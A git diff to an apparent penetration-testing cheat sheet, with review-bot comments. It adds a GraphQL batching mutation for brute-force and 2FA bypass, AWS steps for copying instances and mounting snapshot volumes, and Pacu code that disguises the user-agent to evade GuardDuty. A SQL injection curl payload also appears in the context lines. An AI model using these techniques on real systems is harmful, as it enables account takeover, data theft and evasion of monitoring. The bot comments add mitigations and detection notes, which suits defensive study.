diff --git a/GraphQL Injection/README.md b/GraphQL Injection/README.md index b192960c..3a9883b9 100644 --- a/GraphQL Injection/README.md +++ b/GraphQL Injection/README.md @@ -16,6 +16,7 @@ * [Use mutations](#use-mutations) * [NOSQL injection](#nosql-injection) * [SQL injection](#sql-injection) + * [GraphQL Batching Attacks](#graphql-batching-attacks) * [References](#references) ## Tools @@ -240,6 +241,37 @@ Simple SQL injection inside a graphql field. curl -X POST http://localhost:8080/graphql\?embedded_submission_form_uuid\=1%27%3BSELECT%201%3BSELECT%20pg_sleep\(30\)%3B--%27 ``` +### GraphQL Batching Attacks + +Common scenario: +* Password Brute-force Amplification Scenario +* 2FA bypassing + +```powershell +mutation finishChannelVerificationMutation( + $input FinishChannelVerificationInput!, + $input2 FinishChannelVerificationInput!, + $input3 FinishChannelVerificationInput!, +){ + first: finishChannelVerificationMutation(input: $input){ + channel{ + id + option{ + ... onChannelSmsOptions{ + number + } + } + status + notificationSubscription(last: 1000){ etc... } + } + } + + + second: finishChannelVerificationMutation(input: $input2){...} + third: finishChannelVerificationMutation(input: $input3){...} +} +``` + ## References 
@@ -256,4 +288,5 @@ curl -X POST http://localhost:8080/graphql\?embedded_submission_form_uuid\=1%27% * [GraphQL cheatsheet - DEVHINTS.IO](https://devhints.io/graphql) * [HIP19 Writeup - Meet Your Doctor 1,2,3 - June 22, 2019 - Swissky](https://swisskyrepo.github.io/HIP19-MeetYourDoctor/) * [Introspection query leaks sensitive graphql system information - @Zuriel](https://hackerone.com/reports/291531) -* [Graphql Bug to Steal Anyone’s Address - Sept 1, 2019 - Pratik Yadav](https://medium.com/@pratiky054/graphql-bug-to-steal-anyones-address-fc34f0374417) \ No newline at end of file +* [Graphql Bug to Steal Anyone’s Address - Sept 1, 2019 - Pratik Yadav](https://medium.com/@pratiky054/graphql-bug-to-steal-anyones-address-fc34f0374417) +* [GraphQL Batching Attack - RENATAWALLARM - DECEMBER 13, 2019](https://lab.wallarm.com/graphql-batching-attack/) \ No newline at end of file diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 066e08e1..395c02f9 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -1102,7 +1102,9 @@ Prerequisite: ### Kerberos Unconstrained Delegation -> The user sends a TGS to access the service, along with their TGT, and then the service can use the user's TGT to request a TGS for the user to any other service and impersonate the user. - https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html +> The user sends a TGS to access the service, along with their TGT, and then the service can use the user's TGT to request a TGS for the user to any other service and impersonate the user. - https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html + +:warning: Unconstrained delegation used to be the only option available in Windows 2000 Domain Compromise via DC Print Server and Unconstrained Delegation 
diff --git a/Methodology and Resources/Cloud - AWS Pentest.md b/Methodology and Resources/Cloud - AWS Pentest.md index 50175642..621f19f8 100644 --- a/Methodology and Resources/Cloud - AWS Pentest.md +++ b/Methodology and Resources/Cloud - AWS Pentest.md @@ -1,5 +1,7 @@ # AWS +> Amazon Web Services offers reliable, scalable, and inexpensive cloud computing services. + ## Summary * [Training](#training) @@ -10,7 +12,13 @@ * [Method for Container Service (Fargate)](#method-for-container-service-fargate) * [AWS - Shadow Admin](#aws---shadow-admin) * [Admin equivalent permission](#admin-equivalent-permission) +* [AWS - Mount EBS volume to EC2 Linux](#aws---mount-ebs-volume-to-ec2-linux) +* [AWS - Copy EC2 using AMI Image](#aws---copy-ec2-using-ami-image) * [AWS - Golden SAML Attack](#aws---golden-saml-attack) +* [Cover tracks by obfuscating Cloudtrail logs and Guard Duty](#cover-tracks-by-obfuscating-cloudtrail-logs-and-guard-duty) + * [PenTest:IAMUser/KaliLinux](#) + * [PenTest:IAMUser/ParrotLinux](#) + * [PenTest:IAMUser/PentooLinux](#) * [Security checks](#security-checks) * [References](#references) 
@@ -307,6 +315,52 @@ Example : https://awesomeapp.com/forward?target=http://169.254.169.254/latest/me $ aws glue create-dev-endpoint –endpoint-name my_dev_endpoint –role-arn arn_of_glue_service_role –public-key file://path/to/my/public/ssh/key.pub ``` +## AWS - Mount EBS volume to EC2 Linux + +:warning: EBS snapshots are block-level incremental, which means that every snapshot only copies the blocks (or areas) in the volume that had been changed since the last snapshot. To restore your data, you need to create a new EBS volume from one of your EBS snapshots. The new volume will be a duplicate of the initial EBS volume on which the snapshot was taken. + +Step 1: Head over to EC2 –> Volumes and create a new volume of your preferred size and type. +Step 2: Select the created volume, right click and select the "attach volume" option. +Step 3: Select the instance from the instance text box as shown below : `attach ebs volume` + ```powershell + aws ec2 create-volume –snapshot-id snapshot_id --availability-zone zone + aws ec2 attach-volume –-volume-id volume_id –-instance-id instance_id --device device + ``` + +Step 4: Now, login to your ec2 instance and list the available disks using the following command : `lsblk` +Step 5: Check if the volume has any data using the following command : `sudo file -s /dev/xvdf` +Step 6: Format the volume to ext4 filesystem using the following command : `sudo mkfs -t ext4 /dev/xvdf` +Step 7: Create a directory of your choice to mount our new ext4 volume. 
I am using the name “newvolume” : `sudo mkdir /newvolume` +Step 8: Mount the volume to "newvolume" directory using the following command : `sudo mount /dev/xvdf /newvolume/` +Step 9: cd into newvolume directory and check the disk space for confirming the volume mount : `cd /newvolume; df -h .` + + +## AWS - Copy EC2 using AMI Image + +First you need to extract data about the current instances and their AMI/security groups/subnet : `aws ec2 describe-images --region eu-west-1` + +```powershell +# create a new image for the instance-id +$ aws ec2 create-image --instance-id i-0438b003d81cd7ec5 --name "AWS Audit" --description "Export AMI" --region eu-west-1 + +# add key to AWS +$ aws ec2 import-key-pair --key-name "AWS Audit" --public-key-material file://~/.ssh/id_rsa.pub --region eu-west-1 + +# create ec2 using the previously created AMI, use the same security group and subnet to connect easily. +$ aws ec2 run-instances --image-id ami-0b77e2d906b00202d --security-group-ids "sg-6d0d7f01" --subnet-id subnet-9eb001ea --count 1 --instance-type t2.micro --key-name "AWS Audit" --query "Instances[0].InstanceId" --region eu-west-1 + +# now you can check the instance +aws ec2 describe-instances --instance-ids i-0546910a0c18725a1 + +# If needed : edit groups +aws ec2 modify-instance-attribute --instance-id "i-0546910a0c18725a1" --groups "sg-6d0d7f01" --region eu-west-1 + +# be a good guy, clean our instance to avoid any useless cost +aws ec2 stop-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1 +aws ec2 terminate-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1 +``` + + ## AWS - Golden SAML Attack https://www.youtube.com/watch?v=5dj4vOqqGZw 
@@ -326,6 +380,51 @@ $ python .\shimit.py -idp http://adfs.lab.local/adfs/services/trust -pk key_file -u domain\admin -n admin@domain.com -r ADFS-admin -r ADFS-monitor -id 123456789012 ``` +## Cover tracks by obfuscating Cloudtrail logs and Guard Duty + +:warning: When using awscli on Kali Linux, Pentoo and Parrot Linux, a log is generated based on the user-agent. + +Pacu bypass this problem by defining a custom User-agent (https://github.com/RhinoSecurityLabs/pacu/blob/master/pacu.py#L1473) + +```python +boto3_session = boto3.session.Session() +ua = boto3_session._session.user_agent() +if 'kali' in ua.lower() or 'parrot' in ua.lower() or 'pentoo' in ua.lower(): # If the local OS is Kali/Parrot/Pentoo Linux + # GuardDuty triggers a finding around API calls made from Kali Linux, so let's avoid that... + self.print('Detected environment as one of Kali/Parrot/Pentoo Linux. Modifying user agent to hide that from GuardDuty...') +``` + +### PenTest:IAMUser/KaliLinux + +#### Finding description + +**An API was invoked from a Kali Linux EC2 instance\.** + +This finding informs you that a machine running Kali Linux is making API calls using credentials that belong to your AWS account\. Your credentials might be compromised\. Kali Linux is a popular penetration testing tool that security professionals use to identify weaknesses in EC2 instances that require patching\. Attackers also use this tool to find EC2 configuration weaknesses and gain unauthorized access to your AWS environment\. For more information, see [Remediating Compromised AWS Credentials](guardduty_remediate.md#compromised-creds)\. + +#### Default severity: Medium + +### PenTest:IAMUser/ParrotLinux + +#### Finding description + +**An API was invoked from a Parrot Security Linux EC2 instance\.** + +This finding informs you that a machine running Parrot Security Linux is making API calls using credentials that belong to your AWS account\. Your credentials might be compromised\. 
Parrot Security Linux is a popular penetration testing tool that security professionals use to identify weaknesses in EC2 instances that require patching\. Attackers also use this tool to find EC2 configuration weaknesses and gain unauthorized access to your AWS environment\. For more information, see [Remediating Compromised AWS Credentials](guardduty_remediate.md#compromised-creds)\. + +#### Default severity: Medium + +### PenTest:IAMUser/PentooLinux + +#### Finding description + +**An API was invoked from a Pentoo Linux EC2 instance\.** + +This finding informs you that a machine running Pentoo Linux is making API calls using credentials that belong to your AWS account\. Your credentials might be compromised\. Pentoo Linux is a popular penetration testing tool that security professionals use to identify weaknesses in EC2 instances that require patching\. Attackers also use this tool to find EC2 configuration weaknesses and gain unauthorized access to your AWS environment\. For more information, see [Remediating Compromised AWS Credentials](guardduty_remediate.md#compromised-creds)\. + +#### Default severity: Medium + + ## Security checks https://github.com/DenizParlak/Zeus 
@@ -390,4 +489,7 @@ https://github.com/DenizParlak/Zeus * [PACU Spencer Gietzen - 30 juil. 2018](https://www.youtube.com/watch?v=XfetW1Vqybw&feature=youtu.be&list=PLBID4NiuWSmfdWCmYGDQtlPABFHN7HyD5) * [Cloud security instance metadata - PumaScan](https://pumascan.com/resources/cloud-security-instance-metadata/) * [Privilege escalation in the Cloud: From SSRF to Global Account Administrator - Maxime Leblanc - Sep 1, 2018](https://medium.com/poka-techblog/privilege-escalation-in-the-cloud-from-ssrf-to-global-account-administrator-fd943cf5a2f6) -* [AWS - Cheatsheet - @Magnussen](https://www.magnussen.funcmylife.fr/article_35) \ No newline at end of file +* [AWS - Cheatsheet - @Magnussen](https://www.magnussen.funcmylife.fr/article_35) +* [amazon-guardduty-user-guide PenTest Finding Types - @awsdocs](https://github.com/awsdocs/amazon-guardduty-user-guide/blob/master/doc_source/guardduty_pentest.md) +* [HOW I HACKED A WHOLE EC2 NETWORK DURING A PENETRATION TEST - by Federico Fernandez](https://www.secsignal.org/en/news/how-i-hacked-a-whole-ec2-network-during-a-penetration-test/) +* [How to Attach and Mount an EBS volume to EC2 Linux Instance - AUGUST 17, 2016](https://devopscube.com/mount-ebs-volume-ec2-instance/) \ No newline at end of file
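Review bot: the mutation in the new `GraphQL Batching Attacks` section has syntax errors and a wrong fence language. The variable definitions are missing their colons (`$input FinishChannelVerificationInput!` should be `$input: FinishChannelVerificationInput!`), the inline fragment should read `... on ChannelSmsOptions` rather than `... onChannelSmsOptions`, and the block is fenced as ```powershell although it is a GraphQL document, so tag it ```graphql. "Common scenario:" introduces two items and should be plural. The section also never says what the technique is: several aliased calls of the same mutation (`first:`, `second:`, `third:`) are sent in one HTTP request, so a rate limit that counts requests rather than resolver invocations never fires. One sentence on that, plus the usual mitigations (cap the number of aliases or batched operations per request, rate-limit the sensitive resolver rather than the endpoint, count failed attempts per account rather than per request), would make the section useful to defenders as well.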
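Review bot: the new reference `GraphQL Batching Attack - RENATAWALLARM - DECEMBER 13, 2019` is in all caps while every neighbouring entry uses title case and a `Month Day, Year` date; write it in the same style as the other entries. The hunk also keeps the `\ No newline at end of file` marker; add a trailing newline while the last line is being edited anyway.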
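Review bot: in the `Kerberos Unconstrained Delegation` hunk the removed and re-added quote line read identically, so this looks like a whitespace-only change; confirm it is intentional, otherwise drop it to keep the diff minimal. The added line `:warning: Unconstrained delegation used to be the only option available in Windows 2000` has no terminal punctuation and stops short of the point that matters: constrained delegation arrived with Windows Server 2003, so unconstrained delegation on anything other than domain controllers is a legacy setting that can be audited and removed (`Get-ADComputer -Filter {TrustedForDelegation -eq $true}` lists the computer accounts that still have it).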
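Review bot: the three GuardDuty sub-entries in the AWS summary link to `#`, which just jumps to the top of the page. GitHub builds heading anchors by lowercasing the text and dropping every character that is not a letter, digit, space or hyphen, so `### PenTest:IAMUser/KaliLinux` is reachable as `#pentestiamuserkalilinux` (and likewise `#pentestiamuserparrotlinux` and `#pentestiamuserpentoolinux`). The two new EBS/AMI entries above them are fine.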
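Review bot: the `AWS - Mount EBS volume to EC2 Linux` hunk has a logic problem in step 6 and non-working CLI flags in step 3. The warning paragraph and the `create-volume --snapshot-id` command describe restoring data from a snapshot, but step 6 then runs `sudo mkfs -t ext4 /dev/xvdf`, which wipes that data; `mkfs` belongs only on a freshly created empty volume, i.e. when step 5's `sudo file -s /dev/xvdf` prints `data`, and a volume built from a snapshot should be mounted as is. The flags in the fenced block use en dashes (`–snapshot-id`, `–-volume-id`, `–-instance-id`), which the AWS CLI rejects as unknown options; they must be plain double hyphens. Smaller points: step 3 says "as shown below" and refers to a console screenshot that is not in the file; the device name `/dev/xvdf` only applies to Xen-based instance types, on Nitro instances the attached volume shows up as `/dev/nvme1n1` in `lsblk`; and the steps are consecutive lines with no blank line between them, so Markdown renders them as one paragraph; separate them or make them a numbered list.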
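Review bot: in `AWS - Copy EC2 using AMI Image`, the opening sentence says the goal is to list the current instances with their AMI, security group and subnet, but the command is `aws ec2 describe-images --region eu-west-1`, which without `--owners self` returns every public AMI in the region and says nothing about instances; `aws ec2 describe-instances --region eu-west-1` returns `ImageId`, `SecurityGroups` and `SubnetId` directly. In the block, `stop-instances` and `terminate-instances` are given `--instance-id`; the documented parameter is `--instance-ids` (it takes a list), so use that form. Two caveats worth a sentence: `create-image` reboots the source instance by default unless `--no-reboot` is passed, and under AWS CLI v2 `import-key-pair` expects the public key as `fileb://` rather than `file://`. The `$` prompt is present on some lines and absent on others; pick one. From the detection side, `CreateImage`, `ImportKeyPair`, `RunInstances` and `ModifyInstanceAttribute` are all recorded by CloudTrail, so this workflow leaves a clear trail, which is worth stating next to the "clean our instance" comment.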
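Review bot: the Pacu snippet in `Cover tracks by obfuscating Cloudtrail logs and Guard Duty` is cut before the line that applies the change, so it only shows the Kali/Parrot/Pentoo check and a print statement; the prose claim that Pacu "defines a custom User-agent" is not demonstrated, and the excerpt should be marked as truncated. The link points at `master` with a `#L1473` fragment, which drifts as the file changes; pin it to a commit. Wording: "Pacu bypass" should be "Pacu bypasses", "Guard Duty" is "GuardDuty", and the warning is imprecise: what is generated is not a log entry but one of GuardDuty's `PenTest:IAMUser/*` finding types, which match on the user-agent string recorded in CloudTrail. The three finding descriptions are pasted from the AWS GuardDuty user guide with its escaped periods (`\.`) and a relative link `guardduty_remediate.md#compromised-creds` that does not resolve in this repository; clean the escapes and point the link at the public documentation. Since the detection keys on a client-controlled header, the section should carry the defender's takeaway: treat these findings as low-fidelity indicators and do not rely on them alone.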
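Review bot: the added AWS references follow the existing `Title - Author - Date` pattern, but `HOW I HACKED A WHOLE EC2 NETWORK DURING A PENETRATION TEST` is in all caps unlike its neighbours, and the hunk keeps the `\ No newline at end of file` marker; fix the casing and add a trailing newline on the last entry.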